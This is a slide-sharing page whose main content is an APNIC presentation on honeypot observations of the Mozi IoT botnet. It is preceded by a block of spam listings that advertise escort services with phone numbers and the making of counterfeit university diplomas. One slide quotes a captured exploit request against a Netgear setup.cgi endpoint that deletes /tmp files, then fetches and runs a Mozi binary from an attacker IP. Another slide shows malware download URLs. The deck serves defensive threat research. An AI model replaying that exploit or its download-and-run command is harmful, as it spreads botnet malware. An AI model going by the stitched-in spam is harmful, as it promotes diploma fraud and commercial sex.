Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girlsRussian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
Russian Call girls in Abu Dhabi 0508644382 Abu Dhabi Call girls
 
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi EscortsRussian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
Russian Escort Abu Dhabi 0503464457 Abu DHabi Escorts
 
一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理一比一原版田纳西大学毕业证如何办理
一比一原版田纳西大学毕业证如何办理
 
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency""Boost Your Digital Presence: Partner with a Leading SEO Agency"
"Boost Your Digital Presence: Partner with a Leading SEO Agency"
 
Real Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirtReal Men Wear Diapers T Shirts sweatshirt
Real Men Wear Diapers T Shirts sweatshirt
 
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查在线制作约克大学毕业证(yu毕业证)在读证明认证可查
在线制作约克大学毕业证(yu毕业证)在读证明认证可查
 
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu DhabiAbu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
Abu Dhabi Escorts Service 0508644382 Escorts in Abu Dhabi
 
Trump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts SweatshirtTrump Diapers Over Dems t shirts Sweatshirt
Trump Diapers Over Dems t shirts Sweatshirt
 
Best SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency DallasBest SEO Services Company in Dallas | Best SEO Agency Dallas
Best SEO Services Company in Dallas | Best SEO Agency Dallas
 
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
best call girls in Hyderabad Finest Escorts Service 📞 9352988975 📞 Available ...
 
Vip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac Room
Vip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac RoomVip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac Room
Vip Firozabad Phone 8250092165 Escorts Service At 6k To 30k Along With Ac Room
 
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime BalliaBallia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
Ballia Escorts Service Girl ^ 9332606886, WhatsApp Anytime Ballia
 
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrStory Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
Story Board.pptxrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrr
 
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
一比一原版(Curtin毕业证书)科廷大学毕业证原件一模一样
 
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
原版制作美国爱荷华大学毕业证(iowa毕业证书)学位证网上存档可查
 
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
哪里办理美国迈阿密大学毕业证(本硕)umiami在读证明存档可查
 
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdfpdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
pdfcoffee.com_business-ethics-q3m7-pdf-free.pdf
 
一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理一比一原版奥兹学院毕业证如何办理
一比一原版奥兹学院毕业证如何办理
 

Observations from the APNIC Community Honeynet Project, presentation by Adli Wahid for the CNCERT International Partnership Conference 2022

  • 1. Observations from the APNIC Community Honeynet Project Adli Wahid Senior Internet Security Specialist APNIC adli@apnic.net || www.apnic.net 1
  • 2. Let’s Connect! • LinkedIn: Adli Wahid • Email: adli@apnic.net 2
  • 3. Discussion 1. Background 2. Mozi (IoT) Botnet 3. Observations 4. Mitigation & Remediation Note: credits to Anutsetsen Enkhzoright anutsetsen.e@khanbank.com for initial work on the research & presentation 3
  • 4. Background (Source of Data) • APNIC Community Honeynet Project oCollaboration with partners across AP oIncluding capacity building related activities • Honeypots & Honeynet oAnything that interact with the honeypots is suspect oConfirmed with observed actions + artifacts (payload, logs, etc) • Types of Honeypots oTelnet/SSH (Cowrie) ** relevant for this talk o100++ sensors 4
  • 5. What We Observe • Attacks that spread via o SSH & Telnet bruteforce o Exploiting _known_ vulnerabilities • Nature of o Malware - cryptominers, ddos agents, etc o Source of attack == infected devices* • Left of the Hack o Observations on attacker’s infrastructure o Bot recruitments o Scripts, malware payload, traffic • Attacks that no one pays attention to ☺ • Share feeds with network operators (DASH) & partners 5 DDoS Attack timeline Build/Buy Infrastructure • Write malware • Infect devices • Setup Command & Control “Left of the Hack” “The Hack”
  • 6. Mozi Botnet • Discovered in September 2019 by Netlab • Significant outbreak in Sept 2020 (100k nodes) • Targets IoT devices (MIPs, ARM, PPC and x86) • Uses unique P2P Command & Control o BitTorrent Distributed Hash Table (DHT) as carrier protocol o Makes it robust & tricky* to track • Some capabilities (from config) o Perform a Ddos attack o Update executable from given URL o Execute command via shell or system() o DNS Spoofing o HTTP Session Hijacking (with JS) o Mining • Code base from other botnets o Gafgyt o Mirai • Propagation o 14 HTTP based exploits of via web interface of IoT Devices o Mainly Telnet**, FTP, SSH credentials brute-force 6
  • 7. 7 Nmap scan report for host-x.static.[redacted].net (219.x.y.184) Host is up (0.062s latency). PORT STATE SERVICE VERSION 53387/tcp open elf-exe ELF 32-bit executable file This host was serving malware (http on port 53387). Shodan fingerprint the device as a DVR
  • 8. Mozi Author ”taken custody” by LEA in 2021 https://blog.netlab.360.com/the-mostly-dead-mozi-and-its-lingering-bots/ Is it still around? 8
  • 9. 2022 - Still Active? durian.fsck.my -- 93.56.202.158[10/Oct/2022:14:24:55 +0900] "GET/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*; wget+http://93.56.202.158:53157/Mozi.m+-O+/tmp/netgear; sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 301 0 Check your webserver logs for Mozi.a or Mozi.m 9
  • 10. Observations in APNIC Honeynet Project • In 05/2022, we observed an ELF binary “.i” in some URLs o Post-login downloads • Pattern looks familiar http://xxx.xxx.xxx.xxx:random_port/.i • IP in URL can be the same as attacking host or different Source IP (attacking/spreading) IP hosting binary:random_port o2022-05-25T11:23:24.433026,59.3.30.251,hxxp://59.3.30.251:10035/.i,KR,4766 o2022-05-25T17:27:31.588334,222.174.143.18,hxxp://222.174.143.18:56102/.i,CN,4134 o2022-05-26T03:30:41.219380,95.154.75.244,hxxp://95.154.75.244:12107/.i,RU,44724 o2022-05-26T06:51:04.319952,37.255.216.173,hxxp://51.19.186.165:23349/.i,IR,58224 o2022-05-26T07:58:51.970983,167.179.185.255,hxxp://31.168.218.95:28681/.i,AU,4764 o2022-05-26T07:35:24.881174,114.230.69.4,hxxp://114.230.69.4:10816/.i,CN,4134 o2022-05-26T08:32:08.109785,167.179.61.43,hxxp://46.237.87.18:9331/.i,HK,135273 10 1. Telnet username:password 2. wget http://x.x.x.x:nnnn/.1
  • 11. The “.i” & Finding Mozi o .i: ELF 32-bit LSB executable, ARM, EABI5 version 1 (GNU/Linux), statically linked, stripped • SHA256 a04ac6d98ad989312783d4fe3456c53730b212c79 a426fb215708b6c6daa3de3 o Known to VirusTotal • Finding Mozi • Maybe we can find Mozi.m or Mozi.a on the webserver? o If .i in $IP:PORT o Then download $IP:PORT/mozi.a || $IP:PORT/mozi.m || $IP:PORT/Mozi.m || $IP:PORT/Mozi.a || $IP:PORT/config 11
  • 12. Observations – (hash) fingerprints :~/feeds/dload/20220601/50.83.145.125:43900$ sha256sum * .i a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m 9bcbb326a28b09faeb6fbfc0e7d68fe6ff79b7248c7b2510aa8dd11cc55e0356 Mozi.m b82e420c071c1c1a5cbf1ad8ba143f5b804a6fe4fd2fbcd28db20f471b7065ab .i ~/feeds/dload/20220601/222.103.181.173:1117$ sha256sum * .i 479768e26969e241244a475f97b1268fd02e303a8d6b5d15c71b552815cae14b mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 mozi.m a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.m 6d41f05fe458414332980d420e42b12d01bd21497631f5b6e60fc8082c170bed .i ~/feeds/dload/20221011/36.229.220.191:27611$ sha256sum * .i 23171f17aa39a4b7c9c492c9bc4668697f68e1863c77ef6502e38ca53860c2fa i b6d6ee5d756cfe9a9638769abef15294d7a9189ac49dc43d9b06fb04976b3bf5 mozi.a a04ac6d98ad989312783d4fe3456c53730b212c79a426fb215708b6c6daa3de3 Mozi.a b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 mozi.m b9410c9df55f3bdfe0cc37f215bbf6d77f85bf5bdad9eb965ad2130f43138657 Mozi.m 289aba46ba734b2aef8a82dc983ef1451e303fc33c05820dd07cb7551ad1a310 .i 12
  • 13. Slowly increasing last 7 months Daily Hits 13 Snapshot on 14/22/2022
  • 14. IPs from AP Region (Last 7 Months) [Snippet] • 2022-12-12T23:57:24.533309,110.x.y.59,hxxp://110.x.y.59:43509/.i [Most Common] • 2022-08-30T11:07:19.374102,202.x.y.26,hxxp://61.a.b.131:58871/.i [Alternative] • 2022-10-18T12:34:38.452976,202.x.y.26,hxxp://219.a.b.184:53387/.i [Repeat Offender] 14 IPs from AP region by Operators 67%
  • 15. Mitigation & Remediation (not just Mozi) • The Usual Advice oHarden Device – Patch, Strong Credentials, Access Controls ▪ But whose job is it anyways to monitor & remediate? ▪ Vulnerabilities sustain ‘old’ worm & bots oTL;DR – Same Story oThere must be a better way oResponding after the fact • Engagement with other stakeholders on the impact of insecure IoTs, Awareness, Policies, PSIRTs • Strengthen collaboration & the Eco-system 15
  • 17. Resources 1. https://blog.netlab.360.com/mozi-another-botnet-using-dht/ 2. https://blog.netlab.360.com/the-mostly-dead-mozi-and-its- lingering-bots/ 3. Mozi Tools - https://kn0wledge.fr/projects/mozitools/ 4. https://www.microsoft.com/security/blog/2021/08/19/how-to- proactively-defend-against-mozi-iot-botnet/ 5. ShadowServer Foundation - https://www.shadowserver.org/what- we-do/network-reporting/get-reports/ 6. APNIC DASH – https://dash.apnic.net 7. APNIC Community Honeynet Project – adli@apnic.net 17